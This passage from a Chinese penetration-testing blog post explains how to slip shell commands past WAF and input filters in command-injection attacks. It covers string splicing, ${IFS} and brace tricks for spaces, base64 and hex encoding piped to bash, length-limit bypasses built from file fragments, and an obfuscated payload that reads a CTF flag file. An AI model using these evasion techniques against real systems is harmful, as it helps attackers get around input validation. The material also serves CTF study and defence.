<p>3.删除从左边开始到指定字符最后一次出现的字符并保留右边字符</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token assign-left variable">string</span><span class="token operator">=</span><span class="token string">"http://www.test.com/index.html"</span>
<span class="token builtin class-name">echo</span> <span class="token variable">${string<span class="token operator">##</span>*<span class="token operator">/</span>}</span> <span class="token comment"># index.html</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>4.删除从右边开始到指定字符第一次出现的字符并保留左边字符</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token assign-left variable">string</span><span class="token operator">=</span><span class="token string">"http://www.test.com/index.html"</span>
<span class="token builtin class-name">echo</span> <span class="token variable">${string<span class="token operator">%</span><span class="token operator">/</span>*}</span> <span class="token comment"># http://www.test.com</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>5.删除从右边开始到指定字符最后一次出行字符并保留左边字符</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token assign-left variable">string</span><span class="token operator">=</span><span class="token string">"http://www.test.com"</span>
<span class="token builtin class-name">echo</span> <span class="token variable">${string<span class="token operator">%%</span><span class="token operator">/</span>*}</span> <span class="token comment"># http:</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>6.从左开始到指定字节数获取字符串中的子串（按照字节截取）格式（${string:起始字节：字节数}）</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token assign-left variable">string</span><span class="token operator">=</span><span class="token string">"hello world"</span>
<span class="token builtin class-name">echo</span> <span class="token variable">${string<span class="token operator">:</span>0<span class="token operator">:</span>7}</span> <span class="token comment"># hello w</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>7.从左开始到指定字节数获取字符串中的子串（从起始字节开始到结束）格式（${string:起始字节}）</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token assign-left variable">string</span><span class="token operator">=</span><span class="token string">"hello world"</span>
<span class="token builtin class-name">echo</span> <span class="token variable">${string<span class="token operator">:</span>7}</span> <span class="token comment"># orld</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>8.从右开始到指定字节数获取字符串中的子串（按照字节获取）格式 （${string:0-起始：字节数}）</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token assign-left variable">string</span><span class="token operator">=</span><span class="token string">"hello world"</span>
<span class="token builtin class-name">echo</span> <span class="token variable">${string<span class="token operator">:</span>0-5<span class="token operator">:</span>3}</span> <span class="token comment"># wor</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>9.从右开始到指定字节数获取字符串中的子串 (从起始字节开始到字符串末尾) ${string:0-5}</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token assign-left variable">string</span><span class="token operator">=</span><span class="token string">"hello world"</span>
<span class="token builtin class-name">echo</span> <span class="token variable">${string<span class="token operator">:</span>0-5}</span> <span class="token comment"># world</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>拼接 shell</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">echo</span> <span class="token string">"w\h\o<span class="token entity" title="\a">\a</span>\m\i"</span> <span class="token operator">|</span> <span class="token function">cut</span> <span class="token parameter variable">-c</span> <span class="token number">1,3</span>,5,7,9,11 <span class="token operator">|</span> <span class="token function">sh</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="2-5-绕过空格过滤"><a href="#2-5-绕过空格过滤" class="headerlink" title="2.5 绕过空格过滤"></a>2.5 绕过空格过滤</h3><p>在前端页面中可以利用%00,%0a,%0d等url编码来绕过空格的过滤，</p>
<p>利用大括号来绕过空格限制</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token punctuation">{</span>ls,-al<span class="token punctuation">}</span>

<span class="token punctuation">{</span>ping,-c,2,127.0.0.1<span class="token punctuation">}</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>${IFS} 绕过空格</p>
<p>IFS是internal field separator的缩写，shell的特殊环境变量。shell根据IFS存储的值，可以是空格（040）、tab（011）、换行符（012）或者其他自定义符号，来解析输入和输出的变量值。这里echo -n是不进行自动换行</p>
<p><img src="/../../../../pic/Pasted%20image%2020221101210054.png"></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">ls</span><span class="token variable">${<span class="token environment constant">IFS</span>}</span><span class="token parameter variable">-la</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="2-6-利用-base64-绕过命令限制"><a href="#2-6-利用-base64-绕过命令限制" class="headerlink" title="2.6 利用 base64 绕过命令限制"></a>2.6 利用 base64 绕过命令限制</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">echo</span> <span class="token function">whoami</span><span class="token operator">|</span>base64 //先输出whoami的base64编码

<span class="token variable"><span class="token variable">`</span><span class="token builtin class-name">echo</span> <span class="token assign-left variable">dwhvYW1pCg</span><span class="token operator">==</span><span class="token operator">|</span>base64 <span class="token parameter variable">-d</span><span class="token variable">`</span></span> //将其base64解码<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221101210216.png"></p>
<h3 id="2-7-hex编码绕过"><a href="#2-7-hex编码绕过" class="headerlink" title="2.7 hex编码绕过"></a>2.7 hex编码绕过</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">echo</span> <span class="token string">"whoami"</span> <span class="token operator">|</span> xxd <span class="token parameter variable">-p</span>

<span class="token builtin class-name">echo</span> <span class="token string">"77686f616d690a"</span> <span class="token operator">|</span> xxd <span class="token parameter variable">-r</span> <span class="token parameter variable">-p</span> <span class="token operator">|</span> <span class="token function">bash</span>
<span class="token comment">#xxd: 二进制显示和处理文件工具,cat: 以文本方式ASCII显示文件</span>
<span class="token comment">#-r参数：逆向转换。将16进制字符串表示转为实际的数</span>
<span class="token comment">#-ps参数：以 postscript的连续16进制转储输出，也叫做纯16进制转储。</span>
<span class="token comment">#-r -p将纯十六进制转储的反向输出打印为了ASCII格式。</span>

<span class="token function">whoami</span> -<span class="token operator">&gt;</span> <span class="token punctuation">\</span>x77<span class="token punctuation">\</span>x68<span class="token punctuation">\</span>x6f<span class="token punctuation">\</span>x61<span class="token punctuation">\</span>x6d<span class="token punctuation">\</span>x69<span class="token punctuation">\</span>x0a
<span class="token comment">#经测试，发现在php的ping环境上执行失败。在linux系统上执行成功</span>
<span class="token variable"><span class="token variable">$(</span><span class="token builtin class-name">printf</span> <span class="token string">"<span class="token entity" title="\x77">\x77</span><span class="token entity" title="\x68">\x68</span><span class="token entity" title="\x6f">\x6f</span><span class="token entity" title="\x61">\x61</span><span class="token entity" title="\x6d">\x6d</span><span class="token entity" title="\x69">\x69</span><span class="token entity" title="\x0a">\x0a</span>"</span><span class="token variable">)</span></span>
<span class="token punctuation">{</span>printf,<span class="token string">"<span class="token entity" title="\x77">\x77</span><span class="token entity" title="\x68">\x68</span><span class="token entity" title="\x6f">\x6f</span><span class="token entity" title="\x61">\x61</span><span class="token entity" title="\x6d">\x6d</span><span class="token entity" title="\x69">\x69</span><span class="token entity" title="\x0a">\x0a</span>"</span><span class="token punctuation">}</span><span class="token operator">|</span><span class="token function">bash</span>
<span class="token variable"><span class="token variable">`</span><span class="token punctuation">{</span>printf,<span class="token string">"<span class="token entity" title="\x77">\x77</span><span class="token entity" title="\x68">\x68</span><span class="token entity" title="\x6f">\x6f</span><span class="token entity" title="\x61">\x61</span><span class="token entity" title="\x6d">\x6d</span><span class="token entity" title="\x69">\x69</span><span class="token entity" title="\x0a">\x0a</span>"</span><span class="token punctuation">}</span><span class="token variable">`</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="2-8-长度限制绕过"><a href="#2-8-长度限制绕过" class="headerlink" title="2.8 长度限制绕过"></a>2.8 长度限制绕过</h3><p>方法一：</p>
<p>可以利用 base64 解码的方式将脚本写入多个文件合并后再执行</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">
<span class="token builtin class-name">echo</span> <span class="token string">"whoami"</span> <span class="token operator">|</span> base64   <span class="token comment"># 首先生成所需命令的base64字符串</span>

<span class="token comment"># d2hvYW1pCg==</span>
<span class="token builtin class-name">echo</span> <span class="token parameter variable">-n</span> d2hv <span class="token operator">&gt;</span> a
<span class="token builtin class-name">echo</span> <span class="token parameter variable">-n</span> YW1p <span class="token operator">&gt;</span>b
<span class="token builtin class-name">echo</span> <span class="token parameter variable">-n</span> <span class="token assign-left variable">Cg</span><span class="token operator">==</span> <span class="token operator">&gt;</span> c

下面合并文件

<span class="token function">cat</span> b <span class="token operator">&gt;&gt;</span> a
<span class="token function">cat</span> c <span class="token operator">&gt;&gt;</span> a

解码文件

base64 <span class="token parameter variable">-d</span> a <span class="token operator">&gt;</span> shell.sh
<span class="token function">sh</span> shell.sh<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>方法二：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">首先通过命令创建带有命令分隔的文件
<span class="token operator">&gt;</span> <span class="token string">"i<span class="token entity" title="\\">\\</span>"</span>
<span class="token operator">&gt;</span> <span class="token string">"m<span class="token entity" title="\\">\\</span>"</span>
<span class="token operator">&gt;</span> <span class="token string">"a<span class="token entity" title="\\">\\</span>"</span>
<span class="token operator">&gt;</span> <span class="token string">"o<span class="token entity" title="\\">\\</span>"</span>
<span class="token operator">&gt;</span> <span class="token string">"h<span class="token entity" title="\\">\\</span>"</span>
<span class="token operator">&gt;</span> <span class="token string">"w<span class="token entity" title="\\">\\</span>"</span>
在用ls -t输出到一个文件中，再利用sh执行
<span class="token function">ls</span> <span class="token parameter variable">-t</span> <span class="token operator">&gt;</span> shell.sh
<span class="token comment">#如果创建空文件时，创建了点.开头的文件，上边命令要添加-a选项将隐藏文件也写入qwzf，即</span>
<span class="token function">ls</span> <span class="token parameter variable">-at</span> <span class="token operator">&gt;</span> shell.sh
<span class="token function">sh</span> shell2.sh<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>


<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">ta<span class="token string">''</span>c<span class="token punctuation">\</span><span class="token variable">${<span class="token environment constant">IFS</span>}</span>fl<span class="token string">''</span>ag_1s_here<span class="token punctuation">\</span><span class="token variable">${<span class="token environment constant">PATH</span><span class="token operator">%%</span>u*}</span>fla<span class="token string">''</span>g_831b69012c67b35f.ph<span class="token string">''</span>p<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">nahv0</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://www.nahv0.top/2023/01/28/penetrationstest/shen-tou-ji-qiao/ming-ling-zhi-xing/rao-guo-waf-yun-xing-ming-ling-zhi-xing-lou-dong-de-fang-fa/">https://www.nahv0.top/2023/01/28/penetrationstest/shen-tou-ji-qiao/ming-ling-zhi-xing/rao-guo-waf-yun-xing-ming-ling-zhi-xing-lou-dong-de-fang-fa/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">nahv0</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/Rce-Trick/">
                                    <span class="chip bg-color">Rce Trick</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'uLfelBhZptG0cuPVosey3XGK-gzGzoHsz',
        appKey: 'VGEIGC5H2KpZfho226lNbpYT',
        serverURLs: 'https://ulfelbhz.lc-cn-n1-shared.com',
        notify: 'true' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '3',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

<!--酷Q推送-->


    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2023/01/28/penetrationstest/shen-tou-ji-qiao/sql-zhu-ru/nosql-zhu-ru-cong-ling-dao-yi/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/0.jpg" class="responsive-img" alt="Nosql 注入从零到一">
                        
                        <span class="card-title">Nosql 注入从零到一</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            Nosql 注入从零到一
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2023-01-28
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/SQL-%E6%B3%A8%E5%85%A5/" class="post-category">
                                    SQL 注入
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Nosql/">
                        <span class="chip bg-color">Nosql</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2023/01/28/penetrationstest/ji-neng-xue-xi/webshell/bu-si-ma/php-bu-si-ma-nei-cun-ma/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/2.jpg" class="responsive-img" alt="PHP 不死马（内存马）">
                        
                        <span class="card-title">PHP 不死马（内存马）</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            PHP 不死马（内存马）
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-01-28
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Trick/" class="post-category">
                                    Trick
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E4%B8%8D%E6%AD%BB%E9%A9%AC/">
                        <span class="chip bg-color">不死马</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>


  <!-- 是否加载使用自带的 prismjs. -->
  <script type="text/javascript" src="/libs/prism/prism.min.js"></script>


<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2023</span>
            
            <a href="/about" target="_blank">nahv0</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/nahv0" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:q.nah@outlook.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>













</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
    
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
